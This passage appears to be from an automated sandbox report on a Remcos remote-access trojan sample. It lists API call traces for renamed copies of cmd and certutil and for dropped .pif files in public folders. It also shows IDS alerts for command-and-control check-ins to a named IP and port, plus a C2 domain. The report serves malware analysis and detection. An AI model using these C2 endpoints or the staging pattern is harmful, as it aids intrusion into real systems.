                    Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdb source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1998728374.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.2003137902.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.2006374754.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.2190614123.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.2081511308.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.2060873941.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000002.2196206720.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000000.2191189282.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000002.2205484657.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000000.2197588239.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000002.2215820004.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000000.2206066287.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000002.2222894108.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000000.2220925872.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000000.2223386290.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000002.2226562413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000000.2227078252.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 
0000001F.00000002.2228243296.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000000.2228676409.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000002.2231357471.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000000.2231834320.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000002.2236395171.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
                    Source: Binary string: powershell.pdbUGP source: xkn.exe, 00000009.00000000.2006908631.00007FF7039FA000.00000002.00000001.01000000.00000005.sdmp, xkn.exe.5.dr
                    Source: Binary string: certutil.pdb source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.dr
                    Source: Binary string: easinvoker.pdbH source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: reg.pdb source: extrac32.exe, 00000007.00000002.2004984243.00000265FFB10000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 0000000E.00000002.2062763578.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 0000000E.00000000.2061379881.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.7.dr
                    Source: Binary string: powershell.pdb source: xkn.exe, 00000009.00000000.2006908631.00007FF7039FA000.00000002.00000001.01000000.00000005.sdmp, xkn.exe.5.dr
                    Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1998728374.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.2003137902.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.2006374754.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.2190614123.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.2081511308.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.2060873941.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000002.2196206720.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000000.2191189282.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000002.2205484657.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000000.2197588239.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000002.2215820004.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000000.2206066287.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000002.2222894108.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000000.2220925872.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000000.2223386290.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000002.2226562413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000000.2227078252.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 
0000001F.00000002.2228243296.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000000.2228676409.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000002.2231357471.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000000.2231834320.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000002.2236395171.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
                    Source: Binary string: reg.pdbGCTL source: extrac32.exe, 00000007.00000002.2004984243.00000265FFB10000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 0000000E.00000002.2062763578.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 0000000E.00000000.2061379881.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.7.dr
                    Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.dr
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF789BD823C
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BD2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF789BD2978
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF789BC35B8
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF789BC1560
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BE7B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF789BE7B4C
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,6_2_00007FF789BD823C
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BD2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,6_2_00007FF789BD2978
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,6_2_00007FF789BC35B8
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,6_2_00007FF789BC1560
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BE7B4C FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF789BE7B4C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,25_2_00007FF67DEB5E58
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF119F8 #359,FindFirstFileW,FindNextFileW,FindClose,25_2_00007FF67DF119F8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,25_2_00007FF67DEBDBC0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF11B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,25_2_00007FF67DF11B04
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEF3674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,25_2_00007FF67DEF3674
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,25_2_00007FF67DEBD4A4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE7D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE7D440
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,25_2_00007FF67DEBB3D8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF16F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,25_2_00007FF67DF16F80
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF110C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,25_2_00007FF67DF110C4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF13100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,25_2_00007FF67DF13100
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEAC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,25_2_00007FF67DEAC6F8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,25_2_00007FF67DF1234C
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9FBB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,28_2_1B9FBB30
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9FC34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,28_2_1B9FC34D
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA0C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,28_2_1BA0C291
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA09AF5 FindFirstFileW,28_2_1BA09AF5
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9F880C FindFirstFileW,FindNextFileW,FindClose,28_2_1B9F880C
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9F783C FindFirstFileW,FindNextFileW,28_2_1B9F783C
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9F9665 FindFirstFileW,FindNextFileW,FindClose,FindClose,28_2_1B9F9665
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9FBD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,28_2_1B9FBD37
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA3E879 FindFirstFileExA,28_2_1BA3E879
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,29_2_00007FF789BD823C
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BD2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,29_2_00007FF789BD2978
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BC35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,29_2_00007FF789BC35B8
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BC1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,29_2_00007FF789BC1560
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BE7B4C FindFirstFileW,FindNextFileW,FindClose,29_2_00007FF789BE7B4C
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_029A5878 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,36_2_029A5878
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2106C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,36_2_2106C34D
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_21069253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,36_2_21069253
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2107C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,36_2_2107C291
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_21069665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,36_2_21069665
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2106880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,36_2_2106880C
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2106783C FindFirstFileW,FindNextFileW,36_2_2106783C
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_210AE879 FindFirstFileExA,36_2_210AE879
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2106BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,36_2_2106BB30
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_21079AF5 FindFirstFileW,FindNextFileW,FindNextFileW,36_2_21079AF5
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2106BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,36_2_2106BD37
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_21067C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,36_2_21067C97

                    Networking

                    Source: Traffic | Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.5:49730 -> 83.137.157.85:9231
                    Source: Traffic | Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 83.137.157.85:9231 -> 192.168.2.5:49730
                    Source: Malware configuration extractor | URLs: ^www.pentegrasystem.com
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_028AC78C InternetCheckConnectionA,28_2_028AC78C
                    Source: global traffic | TCP traffic: 192.168.2.5:49730 -> 83.137.157.85:9231
                    Source: global traffic | HTTP traffic detected: GET /api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platform=desktop HTTP/1.1
                        Accept-Encoding: gzip, deflate
                        Host: cxcs.microsoft.net
                        Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1
                        Host: geoplugin.net
                        Cache-Control: no-cache
                    Source: Joe Sandbox View | IP Address: 239.255.255.250
                    Source: Joe Sandbox View | IP Address: 178.237.33.50
                    Source: Joe Sandbox View | ASN Name: INVITECHHU
                    Source: Joe Sandbox View | JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                    Source: Joe Sandbox View | JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
                    Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.35.153.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.35.153.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.35.153.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.35.153.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.35.153.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.35.153.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.35.153.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.35.153.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.35.153.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.35.153.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.35.153.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.35.153.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9F4B96 WaitForSingleObject,SetEvent,recv,28_2_1B9F4B96
                    Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGNCNsLEGIjCLPFnVdLGYjtbKIHiASmHBA5O7_cfgfeKSfVG961wW18u4XGlNJfozYzsMBcrzcRwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-19; NID=513=dIEywckpmnBKntp2GElYlpvANdg1GQg9WS73nz-f5glf4IBfUl3eMpZgnnmShpr9iJ8zBJZaj0vDbSmMSmPVIAAqShn63hvugGyDDhjdWhTmo6-iPW_P22G1Soq0NtFRvrRQtxSQbMFi5XmOtW4IBgt7x104_UZ5eznyt1erQT0
                    Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGNGNsLEGIjD9G5xmGH5ri1rv3DQ5wOXVjujAbZEINLE1ZHU1KvNcD8D04QZH5XmP2eIPYJfEfjEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-19; NID=513=e70pJcXp308g-zLvKr2jNfzlf1AWbQuxx93QyO1wlh747mGP0eLOjf7jkr_UXszPZPorC5RVMqJTvYbevYSerH_RLBZfC-j1bqwdBhdxbbGX0EyDoh3X-F2jSKf5iG07WXr7mZ4q9rkgKDP5hh0YZnm2e-fmfcH5KsRunNsMzjo
